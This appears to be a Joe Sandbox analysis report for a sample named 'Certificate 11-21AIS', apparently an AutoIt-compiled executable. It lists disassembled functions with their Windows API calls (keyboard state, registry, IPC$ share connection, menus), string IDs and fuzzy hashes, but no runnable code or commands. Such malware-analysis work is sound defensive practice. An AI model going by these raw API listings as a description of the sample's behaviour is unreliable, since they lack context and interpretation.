                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 1dc3846190fedd00c8f26ac37c6a7f1a7c23626e919b46979b5b8d00e9efc084
                                                                              • Instruction ID: 817d5a1418f2ff514843761d36969ef7b17f61ec5074262cd7ef57c13481725c
                                                                              • Opcode Fuzzy Hash: 1dc3846190fedd00c8f26ac37c6a7f1a7c23626e919b46979b5b8d00e9efc084
                                                                              • Instruction Fuzzy Hash: 94514879A04309AFCB15CFA8D885EAEBBB9EF49710F14841DF95AA7250C731A841CB90
                                                                              Function 0090CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-2391861430
                                                                              • Opcode ID: 99f74c9adefb44c8b327a5d8b4c696b7d6416df9156f39b367794af960c381ab
                                                                              • Instruction ID: 4468b057c4cb932553cb740524556cf1e3686dd9901f7b5efd9cfa9259e8d863
                                                                              • Opcode Fuzzy Hash: 99f74c9adefb44c8b327a5d8b4c696b7d6416df9156f39b367794af960c381ab
                                                                              • Instruction Fuzzy Hash: D6515F71900109AACF15EBE4CD46FEEB778FF05344F104169F505B21A2EB31AE99EB62
                                                                              Function 0090CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-3420473620
                                                                              • Opcode ID: e981fdec96c04d6e08071191298f8487f814082df35ace02802a4fdfb732642f
                                                                              • Instruction ID: 89230d4c728f325f5502ff22ff5cbf4e5e9d7984f736e433156690a42b06982e
                                                                              • Opcode Fuzzy Hash: e981fdec96c04d6e08071191298f8487f814082df35ace02802a4fdfb732642f
                                                                              • Instruction Fuzzy Hash: FD518071900109AADF15EBE4CD46FEEB778FF04344F104169F509B2192EA34AF99DB62
                                                                              Function 009055BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009055D7
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00905664
                                                                              • GetMenuItemCount.USER32(00981708), ref: 009056ED
                                                                              • DeleteMenu.USER32(00981708,00000005,00000000,000000F5,?,?), ref: 0090577D
                                                                              • DeleteMenu.USER32(00981708,00000004,00000000), ref: 00905785
                                                                              • DeleteMenu.USER32(00981708,00000006,00000000), ref: 0090578D
                                                                              • DeleteMenu.USER32(00981708,00000003,00000000), ref: 00905795
                                                                              • GetMenuItemCount.USER32(00981708), ref: 0090579D
                                                                              • SetMenuItemInfoW.USER32(00981708,00000004,00000000,00000030), ref: 009057D3
                                                                              • GetCursorPos.USER32(?), ref: 009057DD
                                                                              • SetForegroundWindow.USER32(00000000), ref: 009057E6
                                                                              • TrackPopupMenuEx.USER32(00981708,00000000,?,00000000,00000000,00000000), ref: 009057F9
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00905805
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: e68dcc344b3edfa62d9022bee724c13cdc7e8d46033baae7f378fe07eca23136
                                                                              • Instruction ID: 8aee37765b579f32c04b51145e034f3947bfed64aa3b900bd68d862bce4f816f
                                                                              • Opcode Fuzzy Hash: e68dcc344b3edfa62d9022bee724c13cdc7e8d46033baae7f378fe07eca23136
                                                                              • Instruction Fuzzy Hash: A1710374641A05BEFB209B14CC49FABBF6DFF40368F254205F619AA1D1CB725850DF94
                                                                              Function 008FA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008FA1DC
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008FA211
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008FA22D
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008FA249
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008FA273
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008FA29B
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2A6
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1687751970-22481851
                                                                              • Opcode ID: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                              • Instruction ID: f78ac7668bd2df6d6f26a949ce2a4d37b4d86e1a0a3d6197d252fca948f657b5
                                                                              • Opcode Fuzzy Hash: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                              • Instruction Fuzzy Hash: 44410676C1022DABDF25EBA8DC85EEDB7B8FF14710F044029E905A3160EB719E45DB51
                                                                              Function 00923C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: f5bcf82e28a97d76f738f5e51c5e87b5b2ad421a0863638e7b61817f4865da9c
                                                                              • Instruction ID: 6d326c10a73273d1a4287fd64f4841cdc822683c23ff2b9505dd2b3db088f22c
                                                                              • Opcode Fuzzy Hash: f5bcf82e28a97d76f738f5e51c5e87b5b2ad421a0863638e7b61817f4865da9c
                                                                              • Instruction Fuzzy Hash: DC41523116035A8BDF10EF14E851AEB33A5FF62340F508859FC595B29AEB74DE0ACB11
                                                                              Function 009025B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009336F4,00000010,?,Bad directive syntax error,0095DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009025D6
                                                                              • LoadStringW.USER32(00000000,?,009336F4,00000010), ref: 009025DD
                                                                              • _wprintf.LIBCMT ref: 00902610
                                                                              • __swprintf.LIBCMT ref: 00902632
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009026A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1080873982-4153970271
                                                                              • Opcode ID: bba738fe8468ae6a54f4540fdc13d3f61588c50288b13e14cc0bddd0ddd0b6ba
                                                                              • Instruction ID: 36cc17de1aacd757ab034b881bad912ab713d07cac0f6731056169a4c94e3f30
                                                                              • Opcode Fuzzy Hash: bba738fe8468ae6a54f4540fdc13d3f61588c50288b13e14cc0bddd0ddd0b6ba
                                                                              • Instruction Fuzzy Hash: B421213290021AAFCF11AB94CC4AFEE7B79FF19304F04445AF515A60A3EA71E654EB51
                                                                              Function 00907AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00907B42
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00907B58
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00907B69
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00907B7B
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00907B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 890592661-1007645807
                                                                              • Opcode ID: f65568ebd26792ca31cc55ab3bb08a4afd5d1d2eec2ea12dcb10fd1d746950d4
                                                                              • Instruction ID: d36b1ae17f65dbd8406a381fec463218ecfc4c6c5ee09d7303b17a32ed3db09c
                                                                              • Opcode Fuzzy Hash: f65568ebd26792ca31cc55ab3bb08a4afd5d1d2eec2ea12dcb10fd1d746950d4
                                                                              • Instruction Fuzzy Hash: A211C8A29502697DD724B3A5CC4AEFFBA7CFBD1B14F00451DB415E20C1EE709A45C5B1
                                                                              Function 0090778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 00907794
                                                                                • Part of subcall function 008DDC38: timeGetTime.WINMM(?,75C0B400,009358AB), ref: 008DDC3C
                                                                              • Sleep.KERNEL32(0000000A), ref: 009077C0
                                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009077E4
                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00907806
                                                                              • SetActiveWindow.USER32 ref: 00907825
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00907833
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00907852
                                                                              • Sleep.KERNEL32(000000FA), ref: 0090785D
                                                                              • IsWindow.USER32 ref: 00907869
                                                                              • EndDialog.USER32(00000000), ref: 0090787A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: 6a61591c1ec0e32755d3369c83e8483c7c17dac17fc8f2e374b65d97a5b177b7
                                                                              • Instruction ID: 245ed3e4a86bfec1ac710104d491eb1ad25727d09ca28aa35d5d69754ef06481
                                                                              • Opcode Fuzzy Hash: 6a61591c1ec0e32755d3369c83e8483c7c17dac17fc8f2e374b65d97a5b177b7
                                                                              • Instruction Fuzzy Hash: 812181B962D205BFE7115BA0EC89F2A7F29FB45798F408015F905C22A2CF716D04FB20
                                                                              Function 009102EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CoInitialize.OLE32(00000000), ref: 0091034B
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009103DE
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 009103F2
                                                                              • CoCreateInstance.OLE32(0094DA8C,00000000,00000001,00973CF8,?), ref: 0091043E
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009104AD
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00910505
                                                                              • _memset.LIBCMT ref: 00910542
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0091057E
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009105A1
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 009105A8
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009105DF
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 009105E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: 588f83ff10e362a4d10b598b88d676153116c87a2fc058c05d46373566eba87e
                                                                              • Instruction ID: 3ce46216976e94da598309814ea2575ac59f2ce47a66974e8e8eea3020605a1a
                                                                              • Opcode Fuzzy Hash: 588f83ff10e362a4d10b598b88d676153116c87a2fc058c05d46373566eba87e
                                                                              • Instruction Fuzzy Hash: 00B1EF75A00209AFDB04DFA5C888EAEBBB9FF89304B148459F905EB251D771ED81CF51
                                                                              Function 00902E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 00902ED6
                                                                              • SetKeyboardState.USER32(?), ref: 00902F41
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00902F61
                                                                              • GetKeyState.USER32(000000A0), ref: 00902F78
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00902FA7
                                                                              • GetKeyState.USER32(000000A1), ref: 00902FB8
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00902FE4
                                                                              • GetKeyState.USER32(00000011), ref: 00902FF2
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0090301B
                                                                              • GetKeyState.USER32(00000012), ref: 00903029
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00903052
                                                                              • GetKeyState.USER32(0000005B), ref: 00903060
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 87e33ce33018ca0da35e975c841f93a951585c2c5d462b47b57671fa4d8afd0b
                                                                              • Instruction ID: dd35059510ced60ba0892630c9feddd3f887fbe056ca3baded2ebb63501c6097
                                                                              • Opcode Fuzzy Hash: 87e33ce33018ca0da35e975c841f93a951585c2c5d462b47b57671fa4d8afd0b
                                                                              • Instruction Fuzzy Hash: DD51D875A097882DFB35DBA488147EABFFC5F11380F08859DD6C25A1C2DB549B8CC762
                                                                              Function 008FED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 008FED1E
                                                                              • GetWindowRect.USER32(00000000,?), ref: 008FED30
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008FED8E
                                                                              • GetDlgItem.USER32(?,00000002), ref: 008FED99
                                                                              • GetWindowRect.USER32(00000000,?), ref: 008FEDAB
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008FEE01
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 008FEE0F
                                                                              • GetWindowRect.USER32(00000000,?), ref: 008FEE20
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008FEE63
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 008FEE71
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008FEE8E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008FEE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: bf2d1e35cf3725f68de7d30ad37183de5aef8d517d3d007a4fe01b9018f04790
                                                                              • Instruction ID: 719563e8e4b5aa13ac0a2808d083932df9f11f9668951f2d9b5efc6f289342af
                                                                              • Opcode Fuzzy Hash: bf2d1e35cf3725f68de7d30ad37183de5aef8d517d3d007a4fe01b9018f04790
                                                                              • Instruction Fuzzy Hash: A6512EB5B10209AFDB18DF78DD85EAEBBBAFB88704F158129F619D7290D7709D008B10
                                                                              Function 008DB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008DB759,?,00000000,?,?,?,?,008DB72B,00000000,?), ref: 008DBA58
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008DB72B), ref: 008DB7F6
                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 008DB88D
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0093D8A6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D8D7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D8EE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D90A
                                                                              • DeleteObject.GDI32(00000000), ref: 0093D91C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: b04e8e64ba3c8cf32759fb4c6f278113682a295bd9246606ba424e7e39b41935
                                                                              • Instruction ID: 830307db8d83bcd715b0ba5513f58224bcea9e6cb903e2f00fd4b2b73870adb3
                                                                              • Opcode Fuzzy Hash: b04e8e64ba3c8cf32759fb4c6f278113682a295bd9246606ba424e7e39b41935
                                                                              • Instruction Fuzzy Hash: 03618B34516604DFDB359F18E998B25B7F9FF95316F16062EE08687B60DB30A881EF40
                                                                              Function 008DB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB526: GetWindowLongW.USER32(?,000000EB), ref: 008DB537
                                                                              • GetSysColor.USER32(0000000F), ref: 008DB438
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
